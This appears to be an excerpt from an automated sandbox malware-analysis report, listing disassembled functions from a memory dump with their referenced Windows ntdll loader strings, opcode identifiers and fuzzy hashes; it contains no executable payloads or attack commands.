                                          • Opcode ID: 69a15291f5e4dcecf32b95b4a06c6a0e59547298a730888f366038b673d4e36b
                                          • Instruction ID: 26c2d42214a438e8c62ec7ab5a0ca270c2116bb615e8399d746641a3fcb25534
                                          • Opcode Fuzzy Hash: 69a15291f5e4dcecf32b95b4a06c6a0e59547298a730888f366038b673d4e36b
                                          • Instruction Fuzzy Hash: 9C912671645336AFEB22FF2CC881B6A77E8AB54B1CF05099DFA406B651C7309C44C795
                                          Function 012D63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-792281065
                                          • Opcode ID: 00ced2879d8cd04c5bb26b382b0e1f3019d6dbd7d6577670e004583cd7c853f7
                                          • Instruction ID: d5344c64661afbd41502b632f7777ffaf642e38cc213cfa3d38812a639d369cd
                                          • Opcode Fuzzy Hash: 00ced2879d8cd04c5bb26b382b0e1f3019d6dbd7d6577670e004583cd7c853f7
                                          • Instruction Fuzzy Hash: 64917B70B21316DBEB39DF58D845BAE7BA5FF41B28F100129E6006B389D7B59882C7D0
                                          Function 0129645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                          Download Yara Rule
                                          Strings
                                          • apphelp.dll, xrefs: 01296496
                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 012F99ED
                                          • LdrpInitShimEngine, xrefs: 012F99F4, 012F9A07, 012F9A30
                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 012F9A2A
                                          • minkernel\ntdll\ldrinit.c, xrefs: 012F9A11, 012F9A3A
                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 012F9A01
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-204845295
                                          • Opcode ID: 5dbbb04a848834b2562aeee552608aacd24ba2ef2bc3849e7b87ab9dfa8e020b
                                          • Instruction ID: d78b4e17bc834a570d62828d886be207626b84db886dcce70be0cb654bbebc15
                                          • Opcode Fuzzy Hash: 5dbbb04a848834b2562aeee552608aacd24ba2ef2bc3849e7b87ab9dfa8e020b
                                          • Instruction Fuzzy Hash: CA51C6712683059FEB25EF28D881BABB7E8FF84748F00092DF68597150D671E944CB92
                                          Function 012D2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                          Download Yara Rule
                                          Strings
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 013121BF
                                          • RtlGetAssemblyStorageRoot, xrefs: 01312160, 0131219A, 013121BA
                                          • SXS: %s() passed the empty activation context, xrefs: 01312165
                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01312180
                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01312178
                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0131219F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                          • API String ID: 0-861424205
                                          • Opcode ID: c72f2aaae569f16fe42b8cfc1f8f046268d621af451958f044caa30e0c91b9d0
                                          • Instruction ID: 1b8806f52b091ec4da73b0b07f618455b99ed96e731efe9bba4d6fe4c7151d66
                                          • Opcode Fuzzy Hash: c72f2aaae569f16fe42b8cfc1f8f046268d621af451958f044caa30e0c91b9d0
                                          • Instruction Fuzzy Hash: 84315A3AF61225BBF725DA99CC81F5B7B78DF55A44F254069FB0477144D2709E00C3A0
                                          Function 012DC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                          Download Yara Rule
                                          Strings
                                          • Loading import redirection DLL: '%wZ', xrefs: 01318170
                                          • LdrpInitializeImportRedirection, xrefs: 01318177, 013181EB
                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 013181E5
                                          • minkernel\ntdll\ldrinit.c, xrefs: 012DC6C3
                                          • LdrpInitializeProcess, xrefs: 012DC6C4
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01318181, 013181F5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-475462383
                                          • Opcode ID: 9e8396fd6ac2ef306097f2dffc1be7db3451d482ab4ddebe0ed4e9c30301f9d4
                                          • Instruction ID: b3002015915c7276aa20fa6e71a70fda00f7b4b9bfa079fabc80f9ba0c35e91f
                                          • Opcode Fuzzy Hash: 9e8396fd6ac2ef306097f2dffc1be7db3451d482ab4ddebe0ed4e9c30301f9d4
                                          • Instruction Fuzzy Hash: 3331F3B26643429FD224EF2DD946E2B77D4EF94B24F04066CF945AB295E620EC04C7A2
                                          Function 012E096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012E2DF0: LdrInitializeThunk.NTDLL ref: 012E2DFA
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012E0BA3
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012E0BB6
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012E0D60
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012E0D74
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                          • String ID:
                                          • API String ID: 1404860816-0
                                          • Opcode ID: 8536908324cb209dfd99dc3a218bbdbbecd9b4f4464f49d643a390679861306e
                                          • Instruction ID: 0b3be7353c1d2d23f00d0f00920e94ead6e55b07de2470078fd077a3a4f8775d
                                          • Opcode Fuzzy Hash: 8536908324cb209dfd99dc3a218bbdbbecd9b4f4464f49d643a390679861306e
                                          • Instruction Fuzzy Hash: 77428C71A10705DFDB25CF28C894BAAB7F5FF04304F4445A9E989EB245E7B0AA85CF60
                                          Function 012AA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                          • API String ID: 0-379654539
                                          • Opcode ID: 9f35b91cdd1daccb8b6566aad486e36f3971976d91b8d2613cc8342cc74345e5
                                          • Instruction ID: 4936d9d0567bb3a08767db2f6d94d88b7b1c8135209151f4778ad483aec49e27
                                          • Opcode Fuzzy Hash: 9f35b91cdd1daccb8b6566aad486e36f3971976d91b8d2613cc8342cc74345e5
                                          • Instruction Fuzzy Hash: C0C18C74528382CFDB22CF58C044B6BBBE4FF84708F44496AF9968B291E774C949CB56
                                          Function 012D8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                          Download Yara Rule
                                          Strings
                                          • @, xrefs: 012D8591
                                          • minkernel\ntdll\ldrinit.c, xrefs: 012D8421
                                          • LdrpInitializeProcess, xrefs: 012D8422
                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 012D855E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1918872054
                                          • Opcode ID: 76d34b646394c37979714eac0bf4c12403272f1ff941f6f31305a6640193ff24
                                          • Instruction ID: 5318f25498416480fa870e9263c4ce0b2fbccf1f0c574d412ea8de621ce5a0bf
                                          • Opcode Fuzzy Hash: 76d34b646394c37979714eac0bf4c12403272f1ff941f6f31305a6640193ff24
                                          • Instruction Fuzzy Hash: 84917B71568345AFDB22DB65CC81FABBAECFF84744F80092EFA8592151E374D904CB62
                                          Function 012D273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                          Download Yara Rule
                                          Strings
                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 013121D9, 013122B1
                                          • SXS: %s() passed the empty activation context, xrefs: 013121DE
                                          • .Local, xrefs: 012D28D8
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 013122B6
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                          • API String ID: 0-1239276146
                                          • Opcode ID: b32ec5bfd78eb37f87e8b93d83a8b4e80af27d7354b3b49b124198d8333132e0
                                          • Instruction ID: f1e862f7bd3e389204678730e854e95e647801f6dc01eed401a91b040edd214f
                                          • Opcode Fuzzy Hash: b32ec5bfd78eb37f87e8b93d83a8b4e80af27d7354b3b49b124198d8333132e0
                                          • Instruction Fuzzy Hash: 62A1D13192122ADFDB25CF68CC84BEAB7B1BF58354F2441E9D908AB255D7309E81CF90
                                          Function 012A64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                          Download Yara Rule
                                          Strings
                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 013010AE
                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01300FE5
                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01301028
                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0130106B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                          • API String ID: 0-1468400865
                                          • Opcode ID: 5b9c4cef9ff89b235053566131b87238801f68e23507ba0c2018ca4ba5bf2f2f
                                          • Instruction ID: e92d0fa6dfd4c69629a1eb791529aaefa388554b18a7125de093263d8eafa95b
                                          • Opcode Fuzzy Hash: 5b9c4cef9ff89b235053566131b87238801f68e23507ba0c2018ca4ba5bf2f2f
                                          • Instruction Fuzzy Hash: C27102B19143069FCB21EF18C884BAB7FE8AF55754F840469FA898B286D374D588CBD1
                                          Function 012C245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                          Download Yara Rule
                                          Strings
                                          • LdrpDynamicShimModule, xrefs: 0130A998
                                          • apphelp.dll, xrefs: 012C2462
                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0130A992
                                          • minkernel\ntdll\ldrinit.c, xrefs: 0130A9A2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-176724104
                                          • Opcode ID: 144ace345eb8204e13f3609e7d57bb5df70d829ad6d725561a3c8776c2558aea
                                          • Instruction ID: 3745182426ccf45861fcc4dcd1476a09f45a9bd21eae2e89ad5cb6135fcfe4d9
                                          • Opcode Fuzzy Hash: 144ace345eb8204e13f3609e7d57bb5df70d829ad6d725561a3c8776c2558aea
                                          • Instruction Fuzzy Hash: EA312CB5710302EBDB329F6DA995A7ABBFCFB84B08F15011DE9106B295C7715881C780
                                          Function 012B29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                          Download Yara Rule
                                          Strings
                                          • HEAP[%wZ]: , xrefs: 012B3255
                                          • HEAP: , xrefs: 012B3264
                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 012B327D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                          • API String ID: 0-617086771
                                          • Opcode ID: bf3864ca2de2c5ea748e08fc16e9d1f8131d072a8553c2db84be9c511ac73117
                                          • Instruction ID: 04205d0d3f76ec2a77f676e6007ee595636e9c3445864e8875a3a8a02e16692a
                                          • Opcode Fuzzy Hash: bf3864ca2de2c5ea748e08fc16e9d1f8131d072a8553c2db84be9c511ac73117
                                          • Instruction Fuzzy Hash: EA92AA71A2424ADFEB25CF68C480BEEBBF1FF08340F188059E999AB251D775A945CF50
                                          Function 012B0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          • Opcode ID: 3aa34b700e527d88882468f7db4c8206b2727f80ec02f156c2a35155605c8f48
                                          • Instruction ID: a822c7e39c175282210c41dedf7705995179c79f758e4c2aca5d083b51933322
                                          • Opcode Fuzzy Hash: 3aa34b700e527d88882468f7db4c8206b2727f80ec02f156c2a35155605c8f48
                                          • Instruction Fuzzy Hash: D2F1CE70610606DFEB2ACF68C894BAAB7F9FF44744F148168E5169B381D770E981CF94
                                          Function 012C6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $@
                                          • API String ID: 0-1077428164
                                          • Opcode ID: 5a084feb9f6ff76178c43239073b4178b0dae6a5862731a9d4af22eda6dae651
                                          • Instruction ID: 6799e801360dca7dba21b6f0877cddb1d679f487855aaffe1bb60b16ee0cfb3e
                                          • Opcode Fuzzy Hash: 5a084feb9f6ff76178c43239073b4178b0dae6a5862731a9d4af22eda6dae651
                                          • Instruction Fuzzy Hash: C8C281716283419FD725CF28C891BABBBE5BF88B54F048A2DFA89C7241D774D844CB52
                                          Function 0129A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: FilterFullPath$UseFilter$\??\
                                          • API String ID: 0-2779062949
                                          • Opcode ID: f1e5f92e61d24b8965d97ce344c6776af0f7014af5dce5fc6ecea8167617a337
                                          • Instruction ID: 72a50ad58d71481aeb76ff1e77c61ec7c0a9737b170656c9b5fc21829de33343
                                          • Opcode Fuzzy Hash: f1e5f92e61d24b8965d97ce344c6776af0f7014af5dce5fc6ecea8167617a337
                                          • Instruction Fuzzy Hash: DCA14A75D2162A9BDF31DB68CC88BAAB7B8EF44710F1001E9EA09A7250D7759E84CF50
                                          Function 012DC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                          Download Yara Rule
                                          Strings
                                          • Failed to reallocate the system dirs string !, xrefs: 013182D7
                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 013182DE
                                          • minkernel\ntdll\ldrinit.c, xrefs: 013182E8
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1783798831
                                          • Opcode ID: 04d37ed9feb6fa26b163c6511b6a6e3ce338053f47aed9c1e244875c253e09fc
                                          • Instruction ID: 5fae109c41dfdfc9a226464ef09b57978fc7e2d7453d36b44931397a733bbf28
                                          • Opcode Fuzzy Hash: 04d37ed9feb6fa26b163c6511b6a6e3ce338053f47aed9c1e244875c253e09fc
                                          • Instruction Fuzzy Hash: 934121B1521301EBDB25EB68D885BAB77ECAF48764F01092EFA48D3294E771D800CB91
                                          Function 0135C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                          Download Yara Rule
                                          Strings
                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0135C1C5
                                          • PreferredUILanguages, xrefs: 0135C212
                                          • @, xrefs: 0135C1F1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                          • API String ID: 0-2968386058
                                          • Opcode ID: 0553203751a00426568ed294a26071d05bae4ec4e62e735b0159dd5de8d9e7ad
                                          • Instruction ID: 1292161a6f2cf19b9af50684d7cb89b676ffa2192b55942fee4a8f174af477ff
                                          • Opcode Fuzzy Hash: 0553203751a00426568ed294a26071d05bae4ec4e62e735b0159dd5de8d9e7ad
                                          • Instruction Fuzzy Hash: C3416375E10309EBDF51DED8C891FEEBBBCAB14B4CF14416AEA05B7240D7749A448B90
                                          Function 01334144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                          • API String ID: 0-1373925480
                                          • Opcode ID: 4c0c2241e50315929d904814814933a05aea244881a7dc623787ea9dd2d5b9e5
                                          • Instruction ID: df7c651e8ea1b2b47858b489d7f6d860ce329c92e1ad33c4cc5d1a93f009076f
                                          • Opcode Fuzzy Hash: 4c0c2241e50315929d904814814933a05aea244881a7dc623787ea9dd2d5b9e5
                                          • Instruction Fuzzy Hash: CF41FF32A10659CBEB26DBE8C844BADBBB8FF95348F24045AD941FB791DB348901CB54
                                          Function 01324755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                          Download Yara Rule
                                          Strings
                                          • LdrpCheckRedirection, xrefs: 0132488F
                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01324888
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01324899
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-3154609507
                                          • Opcode ID: b2c7ad165838a7e56ac19d238d33e18c1c1498de7b235ca050492e4eff6809bb
                                          • Instruction ID: 9b667d4c2a82d5bed92278418ad49d31697adc9fb99ee86c2b61d4ae7f0b9a89
                                          • Opcode Fuzzy Hash: b2c7ad165838a7e56ac19d238d33e18c1c1498de7b235ca050492e4eff6809bb
                                          • Instruction Fuzzy Hash: 1D41BE72A242719BCB21EF6CD840A267FE8BF49B58F060569ED699B311D772D800CB91
                                          Function 013220DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                          Download Yara Rule
                                          Strings
                                          • LdrpInitializationFailure, xrefs: 013220FA
                                          • Process initialization failed with status 0x%08lx, xrefs: 013220F3
                                          • minkernel\ntdll\ldrinit.c, xrefs: 01322104
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2986994758
                                          • Opcode ID: 9aef3ee6c35a92d3003c24a1f6d812bcc12ddc7081b95921ffc2f36b7c380088
                                          • Instruction ID: 107f868cbc17dc06d1fa36004e2e401229cfcec1b0b7a1eef13dc3600dd605c2
                                          • Opcode Fuzzy Hash: 9aef3ee6c35a92d3003c24a1f6d812bcc12ddc7081b95921ffc2f36b7c380088
                                          • Instruction Fuzzy Hash: 54F0C275651318AFEB24FA4CCC46F9A376CFB40B58F200069FA007B2C5D2B1A940CA91
                                          Function 012B03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: #%u
                                          • API String ID: 48624451-232158463
                                          • Opcode ID: 0ca2541f83fa045fe0748bcf85d99558cf26453f2c944f7fc14f2531fddb98f1
                                          • Instruction ID: a446487fb6079a693f5fd6232310fb0d077cbfad36858772d65822b694c3b9c0
                                          • Opcode Fuzzy Hash: 0ca2541f83fa045fe0748bcf85d99558cf26453f2c944f7fc14f2531fddb98f1
                                          • Instruction Fuzzy Hash: A0714D71A1014A9FDB06DF98C994BAEB7F8FF08744F144065EA05E7251EA38EE05CB64
                                          Function 012AA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                          Download Yara Rule
                                          Strings
                                          • LdrResSearchResource Exit, xrefs: 012AAA25
                                          • LdrResSearchResource Enter, xrefs: 012AAA13
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                          • API String ID: 0-4066393604
                                          • Opcode ID: 89ce423015bb5906aef44b86edf35fd8b5e5349765d749ae24496085cb5ae878
                                          • Instruction ID: f11ede663ccb09e5a9ea7548fb6682fa1c1ca7ff384c90e57c7eefe7f8d484cb
                                          • Opcode Fuzzy Hash: 89ce423015bb5906aef44b86edf35fd8b5e5349765d749ae24496085cb5ae878
                                          • Instruction Fuzzy Hash: 51E1A571E202199FEB22CF99C994BAEBBF9FF18354F50442AE901E7281E774D940CB50
                                          Function 0136A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `$`
                                          • API String ID: 0-197956300
                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                          • Instruction ID: 95440620b5c19d16c140e4088e1f42bad6c5564f98193c9a130849c75e924f8e
                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                          • Instruction Fuzzy Hash: 41C1E2312043469BE725CF28C841B6BBBE9BFC4318F188A2CF696EB294D774D905CB51
                                          Function 0131E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: 073dfb035bffb69fd21ecce6280dd9b93d59724dec72558eec1a83f1b35e95fc
                                          • Instruction ID: d877a86f3f7b0fb25655fa65ab8b6ee6c1eb7764de9cda3c11d1f6244a2863ea
                                          • Opcode Fuzzy Hash: 073dfb035bffb69fd21ecce6280dd9b93d59724dec72558eec1a83f1b35e95fc
                                          • Instruction Fuzzy Hash: 3A615E71E102199FEB19DFA8C840BADBBF9FB48704F14407DEA59EB295D732A940CB50
                                          Function 013443D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$MUI
                                          • API String ID: 0-17815947
                                          • Opcode ID: 4f302e938fb252acc6cbcf066be84533283fd71e90a4400130e977296e1dff7b
                                          • Instruction ID: 9f8d1ef4853555d6c228c03389c08c385cd37e4b29a11e7645b7ee3b6d57e5f2
                                          • Opcode Fuzzy Hash: 4f302e938fb252acc6cbcf066be84533283fd71e90a4400130e977296e1dff7b
